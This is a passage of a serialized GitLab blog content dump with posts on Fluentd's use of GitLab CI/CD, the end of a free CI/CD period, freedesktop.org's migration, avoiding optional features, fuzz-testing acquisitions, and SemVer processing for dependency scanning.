than through APIs.\n1. Cater to price-insensitive buyers.\n1. Attract users that rarely contribute to open source.\n\nLearn more about these best practices and how GitLab has implemented them by\n[watching Sid’s presentation](https://youtu.be/G6ZupYzr_Zg), or viewing his slides below:\n\n\u003Cfigure class=\"video_container\">\n\u003Ciframe src=\"https://docs.google.com/presentation/d/e/2PACX-1vRzKYXPPenZlKkbun3AklJP-xgrC4ga-AqBRyVxOAs2tczZ1VNNUGriYy0vF8iBccuT58rDcwateT3P/embed?start=false&loop=false&delayms=3000\" frameborder=\"0\" width=\"960\" height=\"569\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\">\u003C/iframe>\n\u003C/figure>\n\nCover image by [Nastuh Abootalebi](https://unsplash.com/@sunday_digital) on\n[Unsplash](https://unsplash.com/photos/eHD8Y1Znfpk)\n{: .note}\n",[267,9,803],{"slug":1921,"featured":6,"template":689},"five-ways-resist-service-wrapping-buyer-based-open-core","content:en-us:blog:five-ways-resist-service-wrapping-buyer-based-open-core.yml","Five Ways Resist Service Wrapping Buyer Based Open Core","en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core.yml","en-us/blog/five-ways-resist-service-wrapping-buyer-based-open-core",{"_path":1927,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1928,"content":1934,"config":1939,"_id":1941,"_type":14,"title":1942,"_source":16,"_file":1943,"_stem":1944,"_extension":19},"/en-us/blog/fluentd-using-gitlab-ci-cd",{"title":1929,"description":1930,"ogTitle":1929,"ogDescription":1930,"noIndex":6,"ogImage":1931,"ogUrl":1932,"ogSiteName":673,"ogType":674,"canonicalUrls":1932,"schema":1933},"Thanks Fluentd for betting on GitLab CI/CD!","We're happy to support fresh CNCF graduate Fluentd with GitLab CI/CD, and excited about their latest innovation offering stream processing on the edge.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678614/Blog/Hero%20Images/gitlab-fluentd.png","https://about.gitlab.com/blog/fluentd-using-gitlab-ci-cd","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Thanks Fluentd for betting on GitLab CI/CD!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2019-05-21\",\n      }",{"title":1929,"description":1930,"authors":1935,"heroImage":1931,"date":1936,"body":1937,"category":10,"tags":1938},[1032],"2019-05-21","\nFluentd, the [latest project to graduate](https://www.fluentd.org/blog/fluentd-cncf-graduation) in the CNCF, announced on stage at KubeCon Barcelona today that it is using [GitLab CI/CD](/solutions/continuous-integration/) for continuous integration. We are thrilled about the shout out and honored to support such an influential and innovative project.\n\nFor those who haven’t yet worked with Fluentd, it is an [open source data collector](https://www.fluentd.org/architecture), which lets you unify the data collection and consumption for a better use and understanding of data. Fluent Bit is their lighter-weight forwarder for those with exacting memory requirements. The project sports 7,868 stars on GitHub and their community has contributed more than 900 contributed plugins. They witness more than 100K downloads a day!\n\nThe latest innovation from Fluentd around [stream processing on the edge](https://docs.fluentbit.io/stream-processing/) can be very useful for our industry. As many of those who monitor large-scale, complex, distributed systems, run IoT businesses, or build smart cities will attest, more and more data is generated by these systems and analysis often needs to happen blazingly fast to be meaningful. The standard data analysis model, where it is first stored and indexed in a database (presumably in some cloud) and then analyzed, is not good enough for some real-time and complex analysis needs. The latencies associated with such data transfer may not be able to support applications involving time-critical, data-driven decision making. With Fluent bit, the Fluent team is looking to process the data while it's still in motion in the Log processor – bringing a lot of advantages of speed.\n\nWhile I am reading papers by others attempting to build stream processing on the edge, I find Fluentd’s efforts exciting because they already have major community traction and are part of companies’ observability workflows for logging. The [CNCF graduation criteria](https://github.com/cncf/toc/blob/master/process/graduation_criteria.adoc) that Fluentd met will further embolden enterprises to try it out, as part of the requirements are a diverse contributor community and security audits.\n\nWe've spent the past few months collaborating with Fluentd on their CI needs, and it's been very educational for us. We learned about the unique challenges that fast-moving projects in the CNCF face, and how we can be of assistance with our CI/CD offering. A large part of the answer is providing clear and consistent guidance around converting pipelines and then supporting the projects to success. If you are a CNCF project interested in working with GitLab CI/CD, holler at us and we’d be delighted to help.\n\nUntil then, enjoy KubeCon Barca!\n",[109,9,1037,845,277,1038],{"slug":1940,"featured":6,"template":689},"fluentd-using-gitlab-ci-cd","content:en-us:blog:fluentd-using-gitlab-ci-cd.yml","Fluentd Using Gitlab Ci Cd","en-us/blog/fluentd-using-gitlab-ci-cd.yml","en-us/blog/fluentd-using-gitlab-ci-cd",{"_path":1946,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1947,"content":1952,"config":1958,"_id":1960,"_type":14,"title":1961,"_source":16,"_file":1962,"_stem":1963,"_extension":19},"/en-us/blog/free-period-for-cicd-external-repositories",{"title":1948,"description":1949,"ogTitle":1948,"ogDescription":1949,"noIndex":6,"ogImage":1211,"ogUrl":1950,"ogSiteName":673,"ogType":674,"canonicalUrls":1950,"schema":1951},"The free period of CI/CD for GitHub is ending soon","The free-of-charge use of CI/CD for GitHub is ending soon, so you'll need to upgrade to continue using this feature.","https://about.gitlab.com/blog/free-period-for-cicd-external-repositories","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The free period of CI/CD for GitHub is ending soon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Parker Ennis\"}],\n        \"datePublished\": \"2020-03-12\",\n      }",{"title":1948,"description":1949,"authors":1953,"heroImage":1211,"date":1955,"body":1956,"category":930,"tags":1957},[1954],"Parker Ennis","2020-03-12","\n\n[CI/CD for GitHub](/solutions/github/) is a feature that lets you use any Git-based repository as a host in combination with GitLab CI/CD regardless of where your source code lives – [GitHub](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/github_integration.html), [Bitbucket](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/bitbucket_integration.html), or any other Git server. To introduce this feature to the large number of users with private repos hosted on GitHub.com, we made it available to users [free of charge](/blog/six-more-months-ci-cd-github/) for a limited time only.\n\nWe then [extended the free period](/blog/ci-cd-github-extended-again/) for an additional limited time. We’ve set the final end date for this free period for March 22, 2020.\n\nIf you wish to continue using [CI/CD for private external repositories](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/index.html) past March 22, 2020, you will need to upgrade your plan to at least a [Silver plan](/pricing/).\n\nOf course, you always have the option of migrating your project to [GitLab.com](https://docs.gitlab.com/ee/user/project/import/github.html). As part of our commitment to our value of transparency and open source, all public repositories on GitLab.com get all of the features in our top-tier Gold plan for free. If your repo on GitHub.com is public, then it gets mirrored to GitLab.com as a public repo and you have access to CI/CD capabilities.\n\nNote: If you are only using [repository mirroring](https://docs.gitlab.com/ee/user/project/repository/repository_mirroring.html#pulling-from-a-remote-repository) without CI/CD then you only need a Bronze plan to continue using this functionality.\n\nSo, what exactly does this mean for you?\n\n*  The ability to mirror private external repositories and run CI/CD on them will no longer be available as of March 22, 2020, unless the repositories have been made public or you have upgraded to an eligible GitLab plan.\n*  Since [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) can only be published through GitLab CI, users who were using a GitHub repository with private projects and haven't upgraded to an eligible GitLab plan will be unable to have private pages.\n\nWe've designed this process to be a smooth transition for our users. If you have any additional questions about the change, or how this impacts you and your teams, please don’t hesitate to reach out:\n*  For general questions or pricing inquiries, please contact our **[Sales team](/sales/)**.\n*  For technical questions or concerns, please review our **[Support options](/support/)**.\n\nThanks!\n",[109,685,267,9],{"slug":1959,"featured":6,"template":689},"free-period-for-cicd-external-repositories","content:en-us:blog:free-period-for-cicd-external-repositories.yml","Free Period For Cicd External Repositories","en-us/blog/free-period-for-cicd-external-repositories.yml","en-us/blog/free-period-for-cicd-external-repositories",{"_path":1965,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1966,"content":1972,"config":1977,"_id":1979,"_type":14,"title":1980,"_source":16,"_file":1981,"_stem":1982,"_extension":19},"/en-us/blog/freedesktop-org-migrates-to-gitlab",{"title":1967,"description":1968,"ogTitle":1967,"ogDescription":1968,"noIndex":6,"ogImage":1969,"ogUrl":1970,"ogSiteName":673,"ogType":674,"canonicalUrls":1970,"schema":1971},"Welcome to GitLab, freedesktop.org!","Freedesktop.org, the home of open source desktop technology development, has migrated to GitLab to improve their workflow and modernize their service.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671252/Blog/Hero%20Images/gitlab-desktop-org-cover.png","https://about.gitlab.com/blog/freedesktop-org-migrates-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Welcome to GitLab, freedesktop.org!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-08-20\",\n      }",{"title":1967,"description":1968,"authors":1973,"heroImage":1969,"date":1974,"body":1975,"category":10,"tags":1976},[1859],"2018-08-20","\nSorry to [keep banging on about it](/blog/drupal-moves-to-gitlab/), but we get pretty excited when [open source projects](/blog/welcome-gnome-to-gitlab/) tell us they’re [#movingtogitlab](/blog/movingtogitlab/). There’s always more room at our inn. So we’re very happy to welcome [freedesktop.org](https://www.freedesktop.org/wiki/) into the fold! We chatted to Daniel Stone, project administrator, about what the project does and why they’re joining us.\n\n## Q & A\n\n- [What is freedesktop.org?](#what-is-freedesktoporg)\n- [How is freedesktop.org used?](#how-is-fdo-used)\n- [What's the connection between freedesktop.org, X Window System, and Linux?](#whats-the-connection-between-fdo-x-window-system-and-linux)\n- [How many contributors work on the project?](#how-many-contributors-work-on-the-project)\n- [Why would someone use freedesktop.org instead of macOS or Microsoft Windows?](#why-would-someone-use-fdo-instead-of-macos-or-microsoft-windows)\n- [Why are you migrating to GitLab?](#why-are-you-migrating-to-gitlab)\n- [How are you anticipating the move to be beneficial?](#how-are-you-anticipating-the-move-to-be-beneficial)\n\n### What is freedesktop.org?\n\nCreated in 2000 by Havoc Pennington (a GNOME developer), freedesktop.org (or fd.o) is a [forge](https://en.wikipedia.org/wiki/Forge_(software))-type hosting site. The idea was to create a neutral collaboration space between [GNOME](/blog/welcome-gnome-to-gitlab/), [KDE](/blog/welcome-kde/), Enlightenment, and other open source desktops. Unlike integrated systems, like Windows and macOS, the open source desktop lacks a lot of shared foundations: what should you open files with, how should you manage windows, and so forth.\n\nOriginally fd.o was a home for these desktop developers to collaborate on common standards, so programs could run portably with the same functionality across different desktops. In 2004, xwin.org was formed by a group of open source graphics developers unhappy with the closed-shop state of the XFree86 project. The two projects of fd.o and xwin.org merged shortly after xwin.org’s founding, with fd.o playing host to the X.Org Foundation, which supervises and facilitates the ongoing development of the graphics stack.\n\nOver the years since, our role as a neutral home for all sorts of desktop technology development has seen us add projects such as GStreamer, LibreOffice, and PulseAudio to our diverse family. Some projects such as systemd and Flatpak originally began their development on fd.o, but moved out to other hosting platforms which better suited their needs and workflow.\n\n### How is fd.o used?\n\nMost of our projects are invisible to users: NetworkManager is probably responsible for driving your Wi-Fi under the hood, though you’re unlikely to interact with it directly. Mesa and Wayland/X.Org will provide the underlying plumbing to render your games and your whole UI, but these are mostly invisible. Your desktop probably leans heavily on the D-Bus message-passing system. Most of it is plumbing.\n\n### What's the connection between fd.o, X Window System, and Linux?\n\nAs part of the graphics stack, fd.o hosts the development of the Linux kernel’s graphics development: drivers from all vendors part of the mainstream kernel (and some which aren’t yet!) use our Git hosting, mailing lists, bug tracking, and other services to build the core kernel graphics infrastructure. All this development happens on our infrastructure, which is then fed into the core Linux kernel during its \"merge window\" every release.\n\nThe X.Org Foundation tries to enable the work of a wide body of open source graphics projects. Originally X.Org itself was just the X Window System, but over the years the code evolved out of X.Org into a number of enabling projects. These include not just alternative window systems such as Wayland, the Mesa 3D graphics library for hardware-accelerated OpenGL, OpenGL ES and Vulkan, Cairo and Pixman for software rendering, libinput for input device handling, and much more. We play host to all those projects, with the Foundation providing an accountable body for administrative work, conference organization, and so on.\n\nOther freedesktop.org projects, as said before, provide all the glue around the margins of your desktop. Providing a database of available applications and preferred MIME type handlers, network device management, inter-process communication, a PDF renderer; in general, all the things we can do well in one place, to enable people who want to write desktop environments to focus on the thing that matters to them: building the actual desktop!\n\nAs part of this, we’ve always tried to stay strenuously vendor-neutral and also project-neutral within the desktop community. Rather than \"picking winners\" or enforcing directions on external projects, we try to slowly and gently build consensus as a neutral forum.\n\n### How many contributors work on the project?\n\nHard to say! We have around 1,300 registered users who directly commit to our family of projects. Not all of them are active of course, but many developers do not have direct commit access and aren’t represented in that figure. We have around 25,000 people subscribed to our various development mailing lists.\n\n### Why would someone use fd.o instead of macOS or Microsoft Windows?\n\nMuch like GitLab, freedesktop.org is an open source, open-participation, neutral platform. Running an open source desktop through distributions such as Arch, Debian, Fedora, or Ubuntu – all of which use our enabling technology – gives the user a fully open source system. This is incredibly empowering: as a user, you have the ability to dive into any part of your system, make the changes you want to see, and participate openly in these projects to see your improvements work upstream.\n\n>As a user, you have the ability to dive into any part of your system, make the changes you want to see, and participate openly in these projects to see your improvements work upstream\n\n### Why are you migrating to GitLab?\n\nOver the years fd.o has been running, we’ve accumulated a wide variety of services: our LDAP-based account system forked back in 2004, Bugzilla for issue tracking, Mailman for mailing lists, cgit and hand-rolled Git hosting, Patchwork for pulling patches from the mailing list when they are submitted for review, Jenkins for build infrastructure, ikiwiki for project wikis, still an FTP server somewhere; the list goes on.\n\nIn terms of workflow, we simply can’t provide some of our projects the workflow they want with this infrastructure. Over the years since we begun, the norm of software development has moved from throwing patches around via email, to fully distributed version control with integrated review and issue tracking, and so on. On paper we provide those services, but integration between them involves a lot of duct tape, and this shows to the users. We saw multiple projects either leave fd.o and move to alternate hosting platforms, or just not develop on our infrastructure to begin with, because we weren’t offering anything like the same level of functionality and convenience as those services.\n\n>Over the years, the norm of software development has moved from throwing patches around via email, to fully distributed version control with integrated review and issue tracking, and so on. On paper we provide those services, but integration between them involves a lot of duct tape, and this shows to the users.\n\nOne of the issues with freedesktop.org being such a diverse family, is that there is no central driven organization behind it. The site is currently run by three volunteers, all of whom keep the site running in our spare time. Maintaining all these services – many of them forked to add now-essential features like spam prevention, as well as our own custom local work for service integration – takes a surprising amount of time, to the point where just keeping it running is about all we can do. Actual improvements are very difficult to implement in the time we have, and even when we can do them, making sure all our projects can take full advantage of them is sometimes too much for us.\n\n### How are you anticipating the move to be beneficial?\n\nFirstly, for the workflow, having linked repository management, issue tracking, code review, CI pipelines and feedback, container repositories, wikis, and websites, provides functionality we couldn’t before – or at least, we were providing a pale imitation of it. As all of this is provided in [GitLab Core](/pricing/) and backed by a single coherent permission model, we are able to open these services up to our member projects who can work with them autonomously, rather than waiting for the admins to deal with services for them.\n\nFrom an admin point of view, having a single application which takes care of all of this will drastically reduce the time we spend treading water and dealing with the impedance mismatch between the disparate services we’ve had until now. Bringing GitLab up on Kubernetes has not been without its challenges as we attempt to bring our service administration skills up into the 21st century, but already it’s shown us that we can move drastically quicker than we have been able to in the past.\n\n>From an admin point of view, having a single application which takes care of our entire workflow will drastically reduce the time we spend treading water and dealing with the impedance mismatch between the disparate services we’ve had until now\n\nIn terms of service modernization, another huge improvement is a modern approach to identity and security. Running an open community site in 2018 is not a fun place to be: not just keeping on top of security vulnerabilities, but targeted break-in attempts and spam. A lot of our previous services aren’t designed to deal with this kind of abuse. Having a single identity service on GitLab – which can link to external identity providers such as Google and GitLab.com, and make use of two-factor authentication – is a huge leap forward for us. Similarly, a coherent approach to spam which doesn’t involve spending an evening trawling through SQL tables by hand makes dealing with spam actually practical!\f\n\n### How can people get involved?\n\nSince we are an umbrella of diverse projects, there's no single answer. We keep a [list of our active projects on our website](https://www.freedesktop.org/wiki/GettingInvolved/): pick the one that's closest to your heart, check out their site and repo, and send your first MR.\n",[9,267,910,686],{"slug":1978,"featured":6,"template":689},"freedesktop-org-migrates-to-gitlab","content:en-us:blog:freedesktop-org-migrates-to-gitlab.yml","Freedesktop Org Migrates To Gitlab","en-us/blog/freedesktop-org-migrates-to-gitlab.yml","en-us/blog/freedesktop-org-migrates-to-gitlab",{"_path":1984,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1985,"content":1991,"config":1997,"_id":1999,"_type":14,"title":2000,"_source":16,"_file":2001,"_stem":2002,"_extension":19},"/en-us/blog/friends-dont-let-friends-add-options-to-code",{"title":1986,"description":1987,"ogTitle":1986,"ogDescription":1987,"noIndex":6,"ogImage":1988,"ogUrl":1989,"ogSiteName":673,"ogType":674,"canonicalUrls":1989,"schema":1990},"Friends don't let friends add options to code","Creating optional features burdens users and applications – here's how we avoid adding options.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678953/Blog/Hero%20Images/options.jpg","https://about.gitlab.com/blog/friends-dont-let-friends-add-options-to-code","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Friends don't let friends add options to code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Suri Patel\"}],\n        \"datePublished\": \"2018-12-10\",\n      }",{"title":1986,"description":1987,"authors":1992,"heroImage":1988,"date":1994,"body":1995,"category":801,"tags":1996},[1993],"Suri Patel","2018-12-10","\nSometimes, when trying to make it easier to work in an application, our instinct is to add\noptional features that users can enable if their situations require a specific functionality.\nOur intentions may be good, but these actions can actually cause _more_ problems, since we invite users\n to second-guess their choices by adding extra steps into the user experience.\n\n## The disadvantages of a [choose your own adventure](https://en.wikipedia.org/wiki/Choose_Your_Own_Adventure) model\n\nOne of the most celebrated aspects of [open source](/solutions/open-source/)\nis the freedom that allows developers to brighten a user’s day by adding an\noptional feature that may not be for everyone, but allows a small portion of users\nto engage with a project in a specific way. While it may seem like a great idea\nto cater to individual needs, there are several disadvantages to making something\nan option.\n\n### It creates more work for developers\n\nCreating extra options means more work for both frontend and backend teams.\nThese features add additional code, tests, and documentation for each setting,\nand the various states alter the UI. Adding options hurts you in every step of\nthe development process.\n\n### It places a burden on the user to choose\n\nWhen we solve problems by including options, we force a user to think about the\nfunction and consider its purpose and drawbacks, placing a burden on them to\ncontrol how they use an application. A user hesitates and has to make a decision\nabout whether this is something that should be enabled. After all, if an option\nsignificantly enhanced the user experience, then wouldn’t it have been automatically\nintegrated?\n\n### It makes future functionality more difficult to implement\n\nThere's also the long-term impact of additional options. Just one extra option can lead to one of two\npaths, which might influence other parts of an application. So, every\ntime we add an option, the number of states of the application doubles. That's\nexponential growth and it adds up quickly, making it harder to diagnose errors. Multiple\noptions can lead to the creation of states of which we’re unaware, so\nit’s harder for the user to understand how an application should behave, because\nthey don't know whether errors are due to an option or not. And, if it is an\noption causing the error, _which_ option is the problem?\n\n## How we avoid adding options: Bask in the glow of iteration\n\nSo, how do you know if a feature should be optional or not? At GitLab, we ship\nthe first [iteration](https://handbook.gitlab.com/handbook/values/#iteration) and keep delivering based on\nuser feedback. Some of the features that we anticipated may never roll out,\nbecause users didn’t request them. Iteration allows us to reduce the scope of\ndevelopment and avoid including features that aren’t popular or useable.\n\nWhenever users need something new, try to create a solution that's acceptable\nfor the most number of people. Rely on your development and operations teams to\nprovide feedback and ask them to relate to the end user. Conducting\n[UX research](/handbook/product/ux/ux-research/#ux-research) with your users\nalso helps identify pain points and needs.\n\nTeams are continually constrained by development capacity, and adding options to\napplications can absorb previous time and effort. We suggest shipping your\napplication without an option and waiting to see whether people request it or\nmake a\n[feature proposal](https://gitlab.com/gitlab-org/gitlab-ce/issues?label_name%5B%5D=feature+proposal)\nfor it. In the end, our role is to solve users’ problems, and our goal is to\nidentify the underlying cause of a challenge and fix it in a way that doesn't\nneed an option.\n\n[Cover image](https://unsplash.com/photos/pKeF6Tt3c08) by [Brendan Church](https://unsplash.com/@bdchu614) on Unsplash\n{: .note}\n",[803,730,9,686],{"slug":1998,"featured":6,"template":689},"friends-dont-let-friends-add-options-to-code","content:en-us:blog:friends-dont-let-friends-add-options-to-code.yml","Friends Dont Let Friends Add Options To Code","en-us/blog/friends-dont-let-friends-add-options-to-code.yml","en-us/blog/friends-dont-let-friends-add-options-to-code",{"_path":2004,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2005,"content":2011,"config":2017,"_id":2019,"_type":14,"title":2020,"_source":16,"_file":2021,"_stem":2022,"_extension":19},"/en-us/blog/fuzz-testing",{"title":2006,"description":2007,"ogTitle":2006,"ogDescription":2007,"noIndex":6,"ogImage":2008,"ogUrl":2009,"ogSiteName":673,"ogType":674,"canonicalUrls":2009,"schema":2010},"How recent acquisitions introduce fuzz testing to GitLab","Learn more about fuzz testing and GitLab's recent acquisitions in the space.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681436/Blog/Hero%20Images/peaches2.jpg","https://about.gitlab.com/blog/fuzz-testing","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How recent acquisitions introduce fuzz testing to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sam Kerr\"}],\n        \"datePublished\": \"2020-07-17\",\n      }",{"title":2006,"description":2007,"authors":2012,"heroImage":2008,"date":2014,"body":2015,"category":930,"tags":2016},[2013],"Sam Kerr","2020-07-17","\n\n{::options parse_block_html=\"true\" /}\n\nGitLab recently acquired two of the leading companies in the fuzz testing space - [Peach Tech](http://peach.tech/) and\n[Fuzzit](https://fuzzit.dev/)! These two companies bring amazing technology into GitLab. Read on the learn more about the technology and how you can easily integrate fuzz testing into your workflow.\n\n## What is fuzz testing?\nFuzz testing is a powerful way to test your apps to find security issues and\nflaws in business logic that traditional QA methods miss. Fuzz testing works by passing\nrandomly generated inputs to your app, and assesses the results.\n\nWhen the app being tested crashes or behaves in an unexpected way, this is\ncalled a \"fault.\" When a fault is discovered, that means there is a way for a user to provide a\nsimilar, but potentially malicious, input to your app in a production environment to crash or\nexploit it. Discovering faults lets you track down bugs in your code that\nyou wouldn't find otherwise and lets you fix them before an attacker can exploit these weaknesses.\n\nThere are a few different methods for fuzz testing. The two primary\nmethods are what we call \"coverage-guided\" fuzz testing and \"behavioral\"\nfuzz testing. Fuzzit and Peach Tech bring these to Gitlab, respectively. Both methods approach fuzz testing differently.\nCoverage-guided fuzz testing leverages the [source code](/solutions/source-code-management/) and instrumented versions\nof the app to be able to observe the app as it is running and dynamically make\nnew tests during a fuzz testing session to exercise new parts of the app to find bugs. Behavioral fuzzing\ntakes a specification of how the app is _supposed_\nto work and tries random inputs to test how it actually works - which usually\nwill find bugs and security issues. Coverage-guided fuzzing and behavioral fuzzing have unique\nadvantages and disadvantages, which is why GitLab aims to offer our users both options\nso you can choose the right one (or both!) for your use case.\n\n## What makes GitLab’s fuzz testing special?\nTraditionally, fuzz testing has been difficult to set up and hard get results from.\nSome of the challenges with fuzz testing include assembling complex testing harnesses to run the fuzz tests and sorting through large amounts of results, including false positives. These challenges can make it time consuming and challenging to get meaningful results from fuzz testing.\nBringing Peach Tech and Fuzzit fuzz testing techniques into the existing GitLab\nworkflow means users can take advantage of the powerful benefits of fuzz\ntesting without any of the traditional difficulties associated with fuzz testing.\nBy bringing these two technologies into GitLab, we will make it easy for users to integrate fuzz testing into their workflows and present results in a meaningful and actionable way.\n\n![Preview of fuzz testing results in an MR](https://about.gitlab.com/images/blogimages/fuzzing_image.png){: .shadow}\nPreview of fuzz testing results in an MR.\n{: .note.text-center}\n\nGitLab will make fuzz testing part of our existing workflow\nso users do not need to use an external tool or interface. Instead, users simply include\na CI job template to use the fuzz testing engines from Fuzzit and Peach Tech. Results will appear inline for developers, alongside the\nother build and test outputs they use today.\n\n## What about open source?\nOpen source is near and dear to our hearts at GitLab. We recently [moved several\nfeatures](/blog/new-features-to-core/) to\nour open source offering. We’ll continue supporting open source\nwith fuzz testing as well. We have published several of our fuzz testing\nengines as open source, so they are accessible to any user and everyone can contribute. This will\ninclude several of the language-specific coverage-guided [fuzz testing engines](https://gitlab.com/groups/gitlab-org/security-products/analyzers/fuzzers)\nas well as [Peach Tech Community Edition](https://gitlab.com/peachtech/peach-fuzzer-community). In the future, we will consider what\nnew fuzz testing pieces we can open source to the community as we build new\ncapabilities for different use cases. One area we are considering is what we\ncan do as we eventually move into [protocol fuzz testing](https://gitlab.com/gitlab-org/gitlab/-/issues/229275). Watch this space!\n\n## When can I get it?\nGitLab will release the minimal version of fuzz testing [later this year](/direction/maturity/#secure)\nas part of GitLab Ultimate. This release will enable behavioral-guided fuzz testing of\nweb APIs that follow the [OpenAPI](https://swagger.io/specification/) specification standard. We will also be\nenabling coverage-guided fuzz testing on apps written in a variety of languages,\nstarting with Go.\n\n## What’s next?\nGitLab is excited to add fuzz testing to the already large suite of\n[application security scanners](/topics/devsecops/) in GitLab’s [Secure stage](/stages-devops-lifecycle/secure/)\nand make it part of\nthe GitLab workflow that developers use already. This makes it easy to shift security\nleft and take advantage of the benefits of fuzz testing.\n\nAs we mature our fuzz testing offering, we will make\nintegrating fuzz testing results into new parts of the workflow a priority. So GitLab developers\ncan directly view fuzz testing results and fix any issues they find. We will also focus on enabling advanced\nconfiguration options for users who want to customize their fuzz tests.\nFinally, we will be expanding fuzz testing to address\nadditional use cases, beyond just web apps and APIs. You can read more about\nour plans for maturing fuzz testing on our [direction page](/direction/secure/dynamic-analysis/fuzz-testing/).\n\nCover image by [Ian Baldwin](https://unsplash.com/@ianebaldwin) on [Unsplash](https://unsplash.com/photos/f7FwHomDgzg)\n{: .note}\n",[1099,9,865],{"slug":2018,"featured":6,"template":689},"fuzz-testing","content:en-us:blog:fuzz-testing.yml","Fuzz Testing","en-us/blog/fuzz-testing.yml","en-us/blog/fuzz-testing",{"_path":2024,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2025,"content":2031,"config":2036,"_id":2038,"_type":14,"title":2039,"_source":16,"_file":2040,"_stem":2041,"_extension":19},"/en-us/blog/generic-semantic-version-processing",{"title":2026,"description":2027,"ogTitle":2026,"ogDescription":2027,"noIndex":6,"ogImage":2028,"ogUrl":2029,"ogSiteName":673,"ogType":674,"canonicalUrls":2029,"schema":2030},"SemVer versioning: how we handled it with linear interval arithmetic","SemVer versioning made it difficult to automate processing. We turned to linear interval arithmetic to come up with a unified, language-agnostic semantic versioning approach.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663397/Blog/Hero%20Images/logoforblogpost.jpg","https://about.gitlab.com/blog/generic-semantic-version-processing","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"SemVer versioning: how we handled it with linear interval arithmetic\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Julian Thome\"}],\n        \"datePublished\": \"2021-09-28\",\n      }",{"title":2026,"description":2027,"authors":2032,"heroImage":2028,"date":2033,"body":2034,"category":865,"tags":2035},[775],"2021-09-28","\nThe [semantic versioning (SemVer) specification](https://semver.org/) can be\nconsidered the de-facto standard for tracking software states during its\nevolution. Unfortunately, in reality many languages/ecosystems practice \"SemVer versioning\" and have not adopted\nthe standard as-is; instead we can find many different semantic versioning\nflavors that are not necessarily compatible with the original SemVer spec. SemVer Versioning has\nled to the creation of a variety of different semantic versioning schemes.\n\nGitLab provides a [Dependency Scanning (DS)](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\nfeature that automatically detects vulnerabilities in the dependencies of a\nsoftware project for a variety of different languages. DS relies on the\n[GitLab Advisory Database](https://gitlab.com/gitlab-org/security-products/gemnasium-db)\nthat is updated on a daily basis providing information about\nvulnerable packages that is expressed in the package-specific (native)\nsemantic version dialect. GitLab also recently launched an [Open Source Edition](https://gitlab.com/gitlab-org/advisories-community) of the GitLab Advisory Database.\n\nAt GitLab we use a semi-automated process for advisory generation: we extract\nadvisory data that includes package names and vulnerable versions from\ndata-sources such as [NVD](https://nvd.nist.gov/) and generate advisories that\nadhere to the GitLab advisory format before they are curated and stored in our\n[GitLab Advisory Database](https://gitlab.com/gitlab-org/security-products/gemnasium-db).\n\nThe plethora of SemVer versioning in the wild posed a major\nchallenge for the level of automation we could apply in the advisory generation\nprocess: the different semantic version dialects prevented us from building\ngeneric mechanisms around version matching, version verification (i.e., the\nprocess of verifying whether or not versions are available on the relevant package\nregistry), fixed version inference etc. Moreover, since advisory generation\nrequires us to extract and update advisory data on scale from data-sources with\nhundreds of thousands vulnerability entries, translating and/or verifying\nversions by hand is not a viable, scalable solution.\n\nHaving a generic method to digest and process a variety of different SemVer versioning dialects was an important building block for automating large parts of the advisory generation process. This led to the development of\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects), a\nutility that helps processing semantic versions in a generic, language-agnostic manner which\nhas been recently open-sourced (MIT) and [published on rubygems.org](https://rubygems.org/gems/semver_dialects).\n\n## Understand the SemVer spec\n\nThe SemVer spec is the de-facto standard for tracking states of software projects during their evolution\nby associating unique, comparable version numbers to distinct states, and by\nencoding semantic properties into the semantic version strings so that a version\nchange implicitly conveys information about the nature of the change.  \n\nA semantic version consists of a prefix (version core) and a suffix that hold\npre-release and/or build information. A version core consists of three numeric\ncomponents that are delimited by `.`:\n\n* major: backwards-incompatible changes\n* minor: new backwards-compatible functionality\n* patch: backwards-compatible bug fixes\n\nConsidering a software project using SemVer, with two releases `1.0.0` and\n`1.0.1`, by just looking at the change applied to the semantic version strings,\nit is clear that `1.0.1` is a newer (more recent) release of the software, whereas version\n`1.0.0` is an older release. In addition, the version number `1.0.1`\nrepresents an improved state of the software as compared to version `1.0.0` which contained a bug\nthat has been fixed in version `1.0.1`. This fix is signalled by the higher number of the patch version component.\n\nSemantic version processing is particularly useful in the context of [Dependency Scanning (DS)](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/). DS is the process of automatically detecting (and potentially fixing)\nvulnerabilities related to the dependencies of a software project: dependencies\nof a software project are checked against a set of configuration files (so\ncalled advisories) that contain information about vulnerable dependencies;\nadvisories usually include the versions of the 